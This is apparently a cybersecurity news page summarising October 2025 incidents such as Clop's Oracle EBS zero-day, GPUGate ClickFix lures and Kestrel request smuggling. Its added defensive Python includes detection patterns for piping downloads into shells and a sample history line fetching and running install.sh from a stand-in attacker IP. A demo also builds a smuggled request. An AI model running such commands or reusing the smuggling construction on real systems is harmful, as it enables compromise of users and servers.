CyberHappenings

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

News Summary

Last updated: 03:45 19/10/2025 UTC
  • **Clop extortion campaign escalates**: Oracle E-Business Suite zero-day exploited, emergency patch released. CISA has added CVE-2025-61882 to its Known Exploited Vulnerabilities catalog, mandating that federal agencies patch by October 27, 2025. The Clop ransomware gang is actively exploiting this authentication-bypass zero-day in Oracle E-Business Suite, with data exfiltration confirmed at Envoy Air and Harvard University. Oracle's emergency patch addresses the HTTP request exploit against `/OA_HTML/SyncServlet`, but WatchTowr Labs warns of imminent mass exploitation after the Scattered Lapsus$ Hunters group leaked the exploit. Rapid7 urges threat hunting for signs of compromise dating back to August 2025.
  • **GPUGate malware expands**: macOS developers targeted via fake Homebrew, LogMeIn, and TradingView platforms. The GPUGate campaign now targets macOS users with fake Homebrew, LogMeIn, and TradingView portals, distributing Atomic macOS Stealer (AMOS) and Odyssey malware. Attackers use SEO poisoning and malicious Google Ads to trick victims into running Terminal commands that bypass Gatekeeper and execute payloads. The latest wave employs "ClickFix" deception, in which users are instructed to paste `curl` commands that fetch and decode `install.sh`, leading to root-level persistence and data exfiltration. Over 100 impersonated apps, including 1Password, Dropbox, and SentinelOne, are used as lures.
  • **SIMCARTEL takedown**: Europol dismantles €4.5M SIM-box fraud operation. European authorities shut down a large-scale SIM-box service behind 3,200+ fraud cases and at least €4.5 million in losses, seizing 1,200 SIM-box devices, 40,000 SIM cards, and five servers, and freezing €431,000 in financial assets and $333,000 in cryptocurrency. The operation, codenamed SIMCARTEL, targeted gogetsms.com and apisim.com, which rented out phone numbers registered in 80+ countries for phishing, investment scams, and extortion. Seven suspects were arrested and luxury vehicles were confiscated. The service enabled fraudulent account creation by defeating SMS verification.
  • **Silver Fox expands Winos 4.0**: HoldingHands RAT hits Japan and Malaysia via phishing and SEO poisoning. The Silver Fox APT group is now targeting Japan and Malaysia with HoldingHands RAT, delivered through malicious PDFs and SEO-poisoned search results. The malware can update its C2 address via a Registry entry, collects host data, and executes arbitrary commands while evading detection. Linked to Operation Silk Lure, the group has been active since March 2024, focusing on the finance, crypto, and trading sectors with highly tailored phishing lures containing .LNK files.
  • **ConnectWise Automate vulnerabilities patched**: AiTM and integrity-bypass risks addressed. ConnectWise fixed two flaws in its Automate RMM platform: CVE-2025-11492 (cleartext transmission of sensitive data, enabling AiTM attacks) and CVE-2025-11493 (lack of integrity checks on update packages). Unpatched on-premises deployments risk credential theft and malicious update injection. Administrators are urged to apply the update immediately, though no active exploitation has been reported. The vulnerabilities primarily affect MSPs and IT departments that use Automate for remote management.
Last updated: 03:15 19/10/2025 UTC
  • **Clop extortion campaign escalates with Oracle E-Business Suite zero-day**: CISA has added CVE-2025-61882 to its Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to patch by October 27, 2025. The Clop ransomware gang is actively exploiting this authentication-bypass zero-day in Oracle E-Business Suite, sending high-volume extortion emails from compromised accounts tied to FIN11. Envoy Air and Harvard University have already confirmed breaches, with attackers stealing business data and commercial contact details. The Scattered Lapsus$ Hunters group leaked the exploit, raising fears of mass indiscriminate attacks within days. Oracle's emergency patch covers versions 12.2.3 through 12.2.14, but WatchTowr Labs warns of imminent opportunistic exploitation by multiple threat groups.
  • **Cisco IOS/XE zero-day exploited in stealthy rootkit attacks**: A new Linux rootkit campaign, codenamed "Operation Zero Disco", exploits CVE-2025-20352, a stack-based buffer overflow in Cisco's SNMP subsystem, to deploy fileless backdoors on older switches. Attackers use a modified Telnet exploit (CVE-2017-3881) to gain memory access, then install hooks in IOSd memory to achieve persistent remote code execution. The rootkit hides running configs, bypasses VTY ACLs, and sets a universal password containing "disco". Targets include Cisco 9400, 9300, and 3750G series; on newer models the implant does not survive a reboot because of ASLR protections. Cisco urges immediate patching to 17.15.4a or disabling the vulnerable OIDs.
  • **Oyster malware spreads via signed fake Microsoft Teams installers**: Microsoft revoked over 200 code-signing certificates tied to Vanilla Tempest (Vice Society) after the group distributed the Oyster backdoor via fake Microsoft Teams installers. The campaign uses SEO poisoning to lure victims searching for "Teams download" to a malicious MSTeamsSetup.exe signed with certificates from Trusted Signing, SSL.com, and DigiCert. The installer drops a DLL under %APPDATA%\Roaming and creates a scheduled task for persistence, enabling remote command execution, payload deployment, and file exfiltration. This follows a September 2025 wave of Rhysida ransomware attacks using the same tactic.
  • **Gladinet zero-day patch released after active exploitation**: Gladinet has patched CVE-2025-11371, an unauthenticated local file inclusion flaw in CentreStack and TrioFox, after attackers used it to read machine keys from Web.config files and then achieve remote code execution via ViewState deserialization. The vulnerability, exploited since September 2025, affects all versions up to and including 16.7.10368.56560. Users must upgrade to 16.10.10408.56683 or, as a temporary mitigation, disable the "temp" handler in Web.config. Three customers were compromised before the patch, with attackers chaining this flaw with CVE-2025-30406 for full system takeover.
  • **GPUGate campaign expands to macOS with Atomic Stealer and Odyssey**: The GPUGate malware campaign, known for its 128 MB MSI evasion tactic, now targets macOS developers via fake Homebrew, LogMeIn, and TradingView platforms. Attackers use SEO poisoning and malicious Google Ads to trick victims into running Terminal commands that fetch Atomic macOS Stealer (AMOS) or the Odyssey backdoor. The malware bypasses Gatekeeper, harvests browser credentials, crypto wallets, and system data, and exfiltrates to C2 servers. Recent samples show new anti-analysis checks and XPC service abuse to blend in with legitimate processes. The campaign has impersonated over 100 apps, including 1Password, Dropbox, and Notion.
  • **PowerSchool attacker sentenced to 4 years for 62M-student breach**: Matthew D. Lane, who orchestrated the 2024 PowerSchool breach exposing data on 62 million students and 9.5 million teachers, was sentenced to four years in prison and ordered to pay $14 million in restitution. Lane pleaded guilty to unauthorized access, cyber extortion, and aggravated identity theft after demanding $2.85M in Bitcoin and later extorting school districts individually. The breach included Social Security numbers, medical data, and parent contact details, affecting 6,505 districts, including 880,000 Texans. The Texas Attorney General has sued PowerSchool for failing to protect sensitive data.
  • **Apple doubles bug bounty to $2M for zero-click RCE, $5M+ with bonuses**: Apple doubled its maximum bug bounty to $2 million for zero-click remote code execution (RCE) chains, with a bonus system pushing payouts past $5 million for high-impact findings. The expanded program includes $1M for unauthorized iCloud access, $100K for Gatekeeper bypasses, and higher rewards for one-click attacks and wireless-proximity exploits. The move follows $35M paid to 800 researchers since 2020 and aims to counter mercenary spyware, with Apple planning to distribute secured iPhone 17 devices to researchers in 2026.

Latest updates


OpenAI denies GPT-6 release in 2025

Updated: · First: 19.10.2025 00:51 · 📰 1 src / 1 articles

OpenAI has confirmed that GPT-6 will not be released in 2025. The company currently offers several models under the GPT-5 umbrella, including GPT-5 Auto, which switches between reasoning and non-reasoning models based on the query. GPT-5-instant provides faster responses using a non-reasoning model. OpenAI has clarified that while GPT-6 is not coming this year, updates to existing models, such as GPT-5.5, may be released.

GPUGate Malware Campaign Targets IT Firms in Western Europe

Updated: 18.10.2025 18:02 · First: 08.09.2025 18:02 · 📰 5 src / 11 articles

A sophisticated malware campaign, codenamed GPUGate, targets IT and software development companies in Western Europe and has recently expanded to macOS users. The campaign leverages Google Ads, SEO poisoning, and fake GitHub commits to deliver malware, including the Atomic macOS Stealer (AMOS) and Odyssey. The Windows side of the operation, active since December 2024, uses a 128 MB Windows Installer (MSI) package to evade detection and relies on GPU-gated decryption and other anti-analysis techniques: the payload is decrypted only when a physical GPU is detected, so GPU-less sandboxes never see it. The end goal is information theft and delivery of secondary payloads. The threat actors have native Russian language proficiency and use a cross-platform approach.

The macOS expansion uses fake Homebrew, LogMeIn, and TradingView platforms. These sites impersonate popular tools and use SEO poisoning to distribute Atomic Stealer and Odyssey; the malware is deployed via Terminal commands that the victim is instructed to paste, and the operators rotate through multiple GitHub usernames to evade takedowns. Similar tactics have been observed in previous campaigns using malicious Google Ads and public GitHub repositories. AMOS now includes a backdoor component for persistent, stealthy access to compromised systems. The campaign impersonates over 100 software solutions, including 1Password, Dropbox, Confluence, Robinhood, Fidelity, Notion, Gemini, Audacity, Adobe After Effects, Thunderbird, and SentinelOne. The fake GitHub pages were created on September 16, 2025, and were immediately submitted for takedown. Campaigns of this kind against macOS users have been observed since at least April 2023, with a similar wave in July 2025.
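The Terminal-command lure is the detectable part of this chain: the victim pastes a command that downloads a script and pipes it into a shell. As an added example, not code from the page or from any vendor cited on it, the Python below scans shell command lines (a shell history file, or the command-line field of an EDR feed) for that pattern and for the related quarantine-attribute removal that defeats Gatekeeper. The history lines are constructed; the `xattr` indicator is a generally known Gatekeeper bypass rather than something the page attributes to GPUGate; `classify`, `fetched_host` and `scan_history` are illustrative names. Note that the legitimate Homebrew installer also fetches an `install.sh` with `curl`, so a `fetch_install_sh` hit on its own needs triage on the host the script was fetched from, which is what the `trusted_hosts` allowlist does.

```python
"""Added example: flag ClickFix-style 'paste this into Terminal' commands in
macOS shell history. Not code from the page or any vendor; lines are constructed."""
import re

# Each pattern names one step of the chain described on the page.
PATTERNS = [
    # curl/wget output piped straight into a shell
    ("remote_script_to_shell", re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    # a decoded base64 blob piped into a shell
    ("base64_decode_to_shell", re.compile(r"base64\s+(--decode|-d|-D)[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    # any download of an install.sh (also matches Homebrew's real installer)
    ("fetch_install_sh", re.compile(r"\b(curl|wget)\b.*\binstall\.sh\b")),
    # quarantine attribute removal: a generic Gatekeeper bypass (assumed indicator)
    ("quarantine_strip", re.compile(r"\bxattr\s+(-d|-r\s+-d|-dr|-rd)\s+com\.apple\.quarantine\b")),
]
URL_HOST_RE = re.compile(r"https?://([^/\s:]+)")


def classify(command: str):
    """Return the pattern names the command matches, in PATTERNS order."""
    return [name for name, rx in PATTERNS if rx.search(command)]


def fetched_host(command: str):
    """Hostname of the first URL in the command, for triage against known-good hosts."""
    m = URL_HOST_RE.search(command)
    return m.group(1) if m else None


def scan_history(lines, trusted_hosts=()):
    """Scan command lines; return (line_no, tags, host, command) for each hit.
    A fetch_install_sh-only hit from a trusted host is dropped, which is how
    the real Homebrew installer is separated from an imposter; a pipe into a
    shell is always reported, whatever the host."""
    findings = []
    for n, cmd in enumerate(lines, 1):
        tags = classify(cmd)
        if not tags:
            continue
        host = fetched_host(cmd)
        if tags == ["fetch_install_sh"] and host in trusted_hosts:
            continue
        findings.append((n, tags, host, cmd))
    return findings


# Constructed sample history. raw.githubusercontent.com is where Homebrew's
# real installer lives; 203.0.113.10 is a documentation address standing in
# for an attacker-controlled host.
SAMPLE_HISTORY = [
    "brew install wget",
    "curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh -o /tmp/install.sh",
    "echo aW5zdGFsbA== | base64 -d | bash",
    "curl -s http://203.0.113.10/install.sh | bash",
    "xattr -d com.apple.quarantine ~/Downloads/Tool.app",
    "ls -la",
]
TRUSTED = ("raw.githubusercontent.com",)

if __name__ == "__main__":
    for finding in scan_history(SAMPLE_HISTORY, TRUSTED):
        print(finding)
```

Run against a real `~/.zsh_history` the lines would first need their timestamp prefix stripped; the patterns themselves are unchanged. Expect false positives from developers who legitimately pipe installers into shells, so treat a hit as a triage lead, not a verdict.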

CAPI Backdoor Targets Russian Auto and E-Commerce Firms via .NET Malware

Updated: · First: 18.10.2025 14:41 · 📰 1 src / 1 articles

A new campaign targeting the Russian automobile and e-commerce sectors uses a previously undocumented .NET malware, CAPI Backdoor. The attack chain involves phishing emails with ZIP archives containing a decoy document and a malicious Windows shortcut file. The malware, disguised as 'adobe.dll', uses legitimate Microsoft binaries to execute and establish persistence. It can steal data from browsers, take screenshots, and exfiltrate information. The campaign includes a domain impersonating a legitimate Russian automotive site.

Silver Fox Expands Winos 4.0 Attacks to Japan and Malaysia with HoldingHands RAT

Updated: · First: 18.10.2025 09:51 · 📰 1 src / 1 articles

The Silver Fox threat group has expanded its Winos 4.0 attacks to target Japan and Malaysia using the HoldingHands RAT. The campaign uses phishing emails carrying malicious PDFs and SEO poisoning to distribute the malware. The group has been active since at least March 2024, targeting various sectors in China, Taiwan, Japan, and Malaysia, and its malware employs sophisticated techniques to evade detection and maintain persistence on compromised systems. HoldingHands RAT connects to a remote server, sends host information, and executes commands from the attacker; it can update its command-and-control (C2) address via a Windows Registry entry, capture sensitive information, run arbitrary commands, and download additional payloads. The group has also been linked to Operation Silk Lure, which targeted the Chinese fintech, cryptocurrency, and trading platform sectors with highly targeted phishing emails containing malicious .LNK files.

ConnectWise Automate vulnerabilities patched

Updated: · First: 17.10.2025 22:29 · 📰 1 src / 1 articles

ConnectWise has released a security update for its Automate product to address two vulnerabilities. The most severe, CVE-2025-11492, allows for cleartext transmission of sensitive information, potentially exposing communications to adversary-in-the-middle (AiTM) attacks. The second, CVE-2025-11493, involves a lack of integrity verification for update packages. The vulnerabilities affect on-premises deployments of Automate, a remote monitoring and management (RMM) platform used by managed service providers (MSPs) and IT departments. The update is marked as a moderate priority, and administrators are advised to install it as soon as possible. These vulnerabilities could allow attackers to intercept or modify traffic, including commands, credentials, and update payloads, potentially leading to the installation of malicious files.

Clop extortion campaign targets Oracle E-Business Suite

Updated: 17.10.2025 22:11 · First: 02.10.2025 06:13 · 📰 16 src / 27 articles

The Clop ransomware gang has been exploiting multiple vulnerabilities in Oracle E-Business Suite (EBS) since at least August 2025, including the zero-day CVE-2025-61882. The gang has been sending extortion emails to executives at multiple organizations, claiming to have stolen sensitive data. The campaign involves a high-volume email blast from hundreds of compromised accounts, some previously linked to the FIN11 threat group, and the emails list contact addresses known from Clop's data leak site. CrowdStrike attributes the exploitation of CVE-2025-61882 to Clop with moderate confidence; the first known exploitation occurred on August 9, 2025. The exploit is an unauthenticated HTTP request to /OA_HTML/SyncServlet that results in an authentication bypass. Oracle has released an emergency patch for the zero-day and shared indicators of compromise. The exploit was leaked by a group called Scattered Lapsus$ Hunters, raising questions about their potential collaboration with Clop.

Envoy Air, a subsidiary of American Airlines, confirmed that data was compromised from its Oracle EBS application after Clop listed American Airlines on its leak site; Envoy stated that no sensitive or customer data was affected, but a limited amount of business information and commercial contact details may have been. Clop is also extorting Harvard University, which confirmed that the incident affects a limited number of parties associated with a small administrative unit. Oracle has confirmed that known EBS vulnerabilities patched in July 2025 may also have been exploited in these attacks. The July 2025 Critical Patch Update addressed 309 vulnerabilities across Oracle's product range, including nine for EBS; three of these are critical and three others are exploitable remotely without authentication.
Mandiant and GTIG are investigating the claims and recommend that organizations receiving these emails investigate their Oracle EBS environments for unusual access or compromise. The UK's National Cyber Security Centre (NCSC) has urged Oracle EBS customers to apply the emergency update for CVE-2025-61882, published over the weekend. The vulnerability affects Oracle EBS versions 12.2.3 through 12.2.14 and allows unauthenticated attackers to send specially crafted HTTP requests to the affected component, resulting in full system compromise. The NCSC warned that the leak of the exploit by Scattered Lapsus$ Hunters increases the risk of opportunistic attacks on Oracle customers. Rapid7 advised operators of affected EBS instances to conduct threat hunting, since exploitation in the wild may have occurred since August 2025; patching alone does not evict an attacker who is already present. CISA has added CVE-2025-61882 to the Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to apply the fixes by October 27, 2025. WatchTowr Labs warns of potential mass, indiscriminate exploitation by multiple groups within days.
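As an added example (not code from the page, Oracle, Rapid7, CISA or any other party cited above), the Python below implements the two checks a hunter would start with: whether a deployed EBS release falls in the affected 12.2.3 through 12.2.14 range, and whether the web tier's access logs show requests to /OA_HTML/SyncServlet on or after the August 9, 2025 first-known exploitation date. The combined log format, the internal address ranges and the log lines themselves are assumptions constructed for the example; Oracle's published indicators of compromise are not reproduced here, and a hit is a lead to correlate with them, not proof of compromise.

```python
"""Added example: two starting checks for hunting CVE-2025-61882 activity.
Not code from the page, Oracle, Rapid7 or CISA. Log lines are constructed."""
import ipaddress
import re
from datetime import datetime, timezone

SYNC_SERVLET = "/OA_HTML/SyncServlet"
# First known in-the-wild exploitation reported on the page.
HUNT_FROM = datetime(2025, 8, 9, tzinfo=timezone.utc)
# Affected Oracle EBS release range reported on the page (inclusive).
AFFECTED_MIN, AFFECTED_MAX = (12, 2, 3), (12, 2, 14)
# Assumed internal ranges; replace with the real environment's address plan.
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Assumed: the EBS web tier writes Apache-style combined access logs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def version_tuple(version: str) -> tuple:
    return tuple(int(part) for part in version.split("."))


def is_affected_version(version: str) -> bool:
    """True for 12.2.3 <= version <= 12.2.14, the range the page reports."""
    return AFFECTED_MIN <= version_tuple(version) <= AFFECTED_MAX


def is_internal(ip: str) -> bool:
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in INTERNAL_NETS)


def hunt_syncservlet(lines):
    """Return every request to /OA_HTML/SyncServlet at or after HUNT_FROM.
    Query strings are ignored and the path match is case-insensitive, so
    /oa_html/syncservlet?x=1 is still caught. Internal sources are kept too:
    an attacker with an existing foothold can reach the servlet from inside."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line; a real hunt would count these
        path = m.group("path").split("?", 1)[0]
        if path.lower() != SYNC_SERVLET.lower():
            continue
        ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
        if ts < HUNT_FROM:
            continue
        hits.append({
            "ip": m.group("ip"),
            "time": ts.isoformat(),
            "method": m.group("method"),
            "status": int(m.group("status")),
            "external": not is_internal(m.group("ip")),
        })
    # External sources first: those are the ones to triage immediately.
    hits.sort(key=lambda h: (not h["external"], h["time"]))
    return hits


# Constructed sample log; the addresses are documentation ranges, not real hosts.
SAMPLE_LOG = [
    '10.1.2.3 - - [08/Aug/2025:09:15:01 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 200 5120',
    '10.1.2.3 - - [12/Aug/2025:08:03:44 +0000] "GET /OA_HTML/SyncServlet?x=1 HTTP/1.1" 200 412',
    '203.0.113.5 - - [12/Aug/2025:02:41:17 +0000] "POST /OA_HTML/SyncServlet HTTP/1.1" 200 1830',
    '198.51.100.9 - - [01/Jul/2025:11:00:00 +0000] "POST /OA_HTML/SyncServlet HTTP/1.1" 200 900',
    'not a log line',
]

if __name__ == "__main__":
    print("12.2.9 affected:", is_affected_version("12.2.9"))
    for hit in hunt_syncservlet(SAMPLE_LOG):
        print(hit)
```

The pre-August request is deliberately excluded by the date filter, but if the hunt turns up external hits in the window the filter should be widened, since the August 9 date is only the earliest exploitation anyone has seen so far.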

Microsoft Lifts Multiple Windows 11 24H2 Safeguard Holds

Updated: 17.10.2025 20:22 · First: 15.09.2025 16:48 · 📰 3 src / 4 articles

Microsoft has lifted multiple compatibility holds that previously prevented Windows 11 24H2 upgrades on devices with specific hardware and software configurations. The latest holds removed were for devices with SenseShield Technology's sprotect.sys driver and wallpaper customization applications. Additionally, earlier holds were removed for devices with integrated cameras due to a face detection bug and for devices with Dirac audio software causing audio device detection issues. The issues affected systems with various software components, leading to problems such as blue or black screen of death (BSOD), desktop icon issues, and audio device malfunctions. Microsoft has released updates and new drivers to address these compatibility issues, allowing eligible devices to upgrade to Windows 11 24H2 via Windows Update. Users may encounter warnings about potential incompatibilities during the upgrade process and are advised to update or uninstall problematic applications.

SIM-box operation dismantled, enabling global telecom fraud

Updated: · First: 17.10.2025 20:01 · 📰 1 src / 1 articles

European law enforcement dismantled an illegal SIM-box service that facilitated over 3,200 fraud cases and caused at least 4.5 million euros in losses. The service provided phone numbers for telecommunication crimes, including phishing, investment fraud, impersonation, and extortion. The operation, codenamed 'SIMCARTEL,' involved multiple countries and seized significant infrastructure and assets. The SIM-box service operated through two websites, gogetsms.com and apisim.com, which have been seized. The service rented out phone numbers registered in over 80 countries, enabling the creation of fraudulent online accounts. The operation resulted in the arrest of seven individuals and the seizure of 1,200 SIM-box devices, 40,000 SIM cards, five servers, and luxury vehicles. Financial assets totaling EUR 431,000 and $333,000 in crypto were also frozen.

AI Chatbot Data Used in Criminal Investigations

Updated: · First: 17.10.2025 18:41 · 📰 1 src / 1 articles

AI chatbot data has become a critical tool in criminal investigations, providing detailed insights into users' intentions and actions. The Palisades Fire case in January 2025 highlighted how AI chat logs can be used to trace criminal intent. This development underscores the need for enterprises to secure AI chat data, as it can reveal sensitive information about business plans, competitive research, and other confidential activities. The use of AI chatbot data in legal proceedings is expected to increase, making it essential for organizations to implement robust security measures to protect this data. AI companies are also enhancing their capabilities to detect and report malicious activities, further emphasizing the importance of securing AI interactions.

HTTP Request Smuggling Vulnerability in ASP.NET Core Kestrel Web Server

Updated: · First: 17.10.2025 18:35 · 📰 1 src / 1 articles

Microsoft patched a high-severity HTTP request smuggling vulnerability (CVE-2025-55315) in Kestrel, the web server for ASP.NET Core. The flaw could allow an authenticated attacker to hijack user credentials or bypass security controls. It affects multiple versions of ASP.NET Core and has been addressed with security updates; Microsoft advises developers to update and redeploy their applications to mitigate potential attacks.
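The page does not describe the specific parsing flaw in Kestrel, and the following added Python example does not attempt to reproduce it. It illustrates the general class instead: when two HTTP/1.1 parsers on the same path (a front-end proxy and a back-end server) disagree about how a request body is framed, one byte stream is read as one request by the first and as two by the second, and the second, attacker-supplied request is then processed in the context of the victim's connection. The message bytes and hostnames are constructed; `split_requests`, `_read_chunked` and `is_ambiguously_framed` are illustrative names, not any library's API.

```python
"""Added example: a CL.TE request-smuggling desync, shown with two minimal
HTTP/1.1 framers. Generic illustration of the vulnerability class, not the
Kestrel flaw itself. All bytes below are constructed."""


def _parse_head(stream: bytes, pos: int):
    """Return (request_line, headers, body_start) or None if the head is incomplete."""
    end = stream.find(b"\r\n\r\n", pos)
    if end < 0:
        return None
    lines = stream[pos:end].decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, end + 4


def _read_chunked(stream: bytes, pos: int):
    """Consume a chunked body; return (body, position after the terminator)."""
    body = b""
    while True:
        line_end = stream.find(b"\r\n", pos)
        size = int(stream[pos:line_end].split(b";")[0], 16)  # ignore chunk extensions
        pos = line_end + 2
        if size == 0:
            return body, stream.find(b"\r\n", pos) + 2  # skip the empty trailer line
        body += stream[pos:pos + size]
        pos += size + 2  # chunk data plus its trailing CRLF


def split_requests(stream: bytes, prefer: str):
    """Split a byte stream into (request_line, body) pairs.
    prefer='cl' honours Content-Length when both framing headers are present
    (the front-end in a CL.TE desync); prefer='te' honours
    Transfer-Encoding: chunked, which is what RFC 9112 requires."""
    requests = []
    pos = 0
    while pos < len(stream):
        parsed = _parse_head(stream, pos)
        if parsed is None:
            break
        request_line, headers, body_start = parsed
        chunked = "chunked" in headers.get("transfer-encoding", "").lower()
        has_cl = "content-length" in headers
        if chunked and (prefer == "te" or not has_cl):
            body, pos = _read_chunked(stream, body_start)
        elif has_cl:
            length = int(headers["content-length"])
            body = stream[body_start:body_start + length]
            pos = body_start + length
        else:
            body, pos = b"", body_start
        requests.append((request_line, body))
    return requests


def is_ambiguously_framed(stream: bytes) -> bool:
    """Hardened check: a request carrying both Content-Length and
    Transfer-Encoding should be rejected (or the connection closed).
    Refusing the ambiguity is what removes the desync."""
    parsed = _parse_head(stream, 0)
    if parsed is None:
        return False
    _, headers, _ = parsed
    return "content-length" in headers and "transfer-encoding" in headers


# Constructed attacker request: the chunked body ends immediately ("0"), and
# the bytes after it form a second request. The Content-Length framer treats
# those bytes as body; the chunked framer treats them as a new request.
SMUGGLED = b"GET /admin HTTP/1.1\r\nHost: app.internal\r\n\r\n"
BODY = b"0\r\n\r\n" + SMUGGLED
STREAM = (b"POST /login HTTP/1.1\r\nHost: app.internal\r\n"
          + b"Content-Length: %d\r\n" % len(BODY)
          + b"Transfer-Encoding: chunked\r\n\r\n" + BODY)

if __name__ == "__main__":
    print("front-end (CL):", [r for r, _ in split_requests(STREAM, "cl")])
    print("back-end  (TE):", [r for r, _ in split_requests(STREAM, "te")])
    print("ambiguous framing:", is_ambiguously_framed(STREAM))
```

The front-end sees one POST and forwards all of it; the back-end sees the POST with an empty body followed by a GET /admin that it attributes to the same client, which is the credential-hijack and control-bypass outcome the advisory describes. The check in `is_ambiguously_framed` is the same rule a hardened server applies before any body parsing.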

Three Dutch Teens Involved in Russian Cyber Espionage Probe

Updated: 17.10.2025 17:45 · First: 27.09.2025 17:17 · 📰 4 src / 5 articles

Three Dutch teenagers, aged 17, are suspected of providing services to a foreign power; one has ties to a Russian-government-affiliated hacker group. One suspect instructed the others to map Wi-Fi networks in The Hague for digital espionage and cyber-attacks. The investigation, led by the State Interference Team of the National Investigation and Interventions Unit, began after a report from the Military Intelligence and Security Service (MIVD). The first two suspects were arrested on September 22, 2025; a third was interviewed and had data devices confiscated but was not arrested because of his limited role. The Netherlands updated its Criminal Code in May 2025 to include penalties for digital espionage, with a maximum sentence of eight years, extendable to 12 years in serious cases. The two arrested teens had attempted to spy on Europol and other targets in The Hague using Wi-Fi sniffer devices; they were recruited via Telegram, were acting on behalf of Russian interests, and conducted reconnaissance near Europol, Eurojust, and the Canadian embassy. Europol confirmed the incident but said there were no signs of compromise of its systems. One of the teens was placed on home bail with an ankle monitor while the other remained in custody, and investigators seized electronic equipment from the teen's home. The teen's father said his son has a part-time job, is a heavy gamer, and is computer savvy with a fascination for hacking. Similar incidents involving individuals recruited by Russian hackers were recently reported in Germany and Ukraine. Dutch Prime Minister Dick Schoof said the incident fits a pattern of hybrid attacks conducted by Russia against Europe, and the case may illustrate a rising trend of Russian threat actors using young people in foreign countries as proxies.
The alleged use of a simple Wi-Fi sniffer shows how nation-state actors can outsource reconnaissance to impressionable youth recruited through social media and propaganda, and in doing so shield themselves from attribution.

VMware Certification Path to IT Leadership

Updated: 17.10.2025 17:02 · First: 10.10.2025 17:02 · 📰 2 src / 2 articles

VMware certifications have significantly boosted the careers of IT professionals, enabling them to transition from technical roles to leadership positions. The certifications provide a structured framework for understanding complex IT environments, troubleshooting, and communicating effectively with leadership. The certification journey involves hands-on practice, community engagement, and a focus on long-term architecture, transforming individuals from reactive operators to proactive strategists. The VMUG Advantage community plays a crucial role in this transformation, offering resources, mentorship, and a global network of professionals. Additionally, VMware certifications boost confidence in pursuing new job opportunities and help build more secure, scalable, and consistent environments. VMUG Advantage provides discounts on training, personal-use licenses, on-demand labs, and access to a global community, accelerating career growth and empowering IT teams.

Windows 11 updates disrupt localhost HTTP/2 connections

Updated: 17.10.2025 16:58 · First: 17.10.2025 01:25 · 📰 2 src / 3 articles

Microsoft's October 2025 Windows 11 cumulative update (KB5066835) and September's KB5065789 preview update break HTTP/2 connections to localhost (127.0.0.1). Users see errors such as ERR_CONNECTION_RESET or ERR_HTTP2_PROTOCOL_ERROR when connecting to a local server, which affects Visual Studio debugging, SSMS Entra ID authentication, and the Duo Desktop app, among others. Windows Server 2025 is also affected. The cause is a bug in HTTP.sys, the kernel-mode HTTP listener that backs IIS and the HTTP.sys server for ASP.NET Core. Microsoft has shipped a temporary fix through Known Issue Rollback (KIR), which reaches unmanaged business devices and most home users automatically; administrators of managed devices can apply it by installing and configuring the corresponding KIR Group Policy. A permanent fix will ship in a future Windows update.

Scarcruft (APT37) Ransomware Campaign Targets South Korea

Updated: 17.10.2025 16:14 · First: 14.08.2025 03:00 · 📰 9 src / 11 articles

The North Korean threat group Scarcruft (APT37) has expanded its campaign targeting South Korea with a combination of infostealers, backdoors, and ransomware. The campaign, dubbed ChinopuNK, began in July 2025 and includes multiple malware tools designed for espionage and financial gain. The attacks start with phishing emails containing decoy documents about postal code updates. Once opened, these documents download NubSpy, a backdoor that uses the PubNub cloud service for command-and-control (C2) communication. The group also deploys ChillyChino, a PowerShell backdoor rewritten in Rust, and VCD ransomware, which encrypts specific file paths tailored to individual targets.

In September 2025, a new phishing campaign, Operation HanKook Phantom, was discovered. It targets individuals associated with the National Intelligence Research Association, including academic figures, former government officials, and researchers. The spear-phishing emails use a "National Intelligence Research Society Newsletter" lure with a ZIP attachment containing a Windows shortcut (LNK) masquerading as a PDF. The LNK file drops RokRAT, which can collect system information, execute arbitrary commands, enumerate the file system, capture screenshots, and download additional payloads; it exfiltrates data via Dropbox, Google Cloud, pCloud, and Yandex Cloud. A variant of the campaign uses a PowerShell script that deploys a dropper, which then runs a next-stage payload to steal sensitive data while disguising its network traffic as a Chrome file upload. The lure document in that instance is a statement issued by Kim Yo Jong, Deputy Director of the Publicity and Information Department of the Workers' Party of Korea, rejecting Seoul's efforts at reconciliation.

Separately, ChillyHell, a modular backdoor for macOS, has resurfaced with a new version. It gives attackers remote access and lets them drop payloads or brute-force passwords. The new sample was uploaded to VirusTotal on May 2, 2025, and had been notarized by Apple in 2021. It has multiple persistence mechanisms and can exfiltrate data, drop additional payloads, enumerate user accounts, and perform local password cracking. Apple revoked the notarization of the associated developer certificates once notified by Jamf. A new cross-platform malware family, ZynorRAT, has also been discovered targeting Windows, Linux, and macOS; it uses a Telegram bot for C2 and supports file exfiltration, system enumeration, and arbitrary command execution.

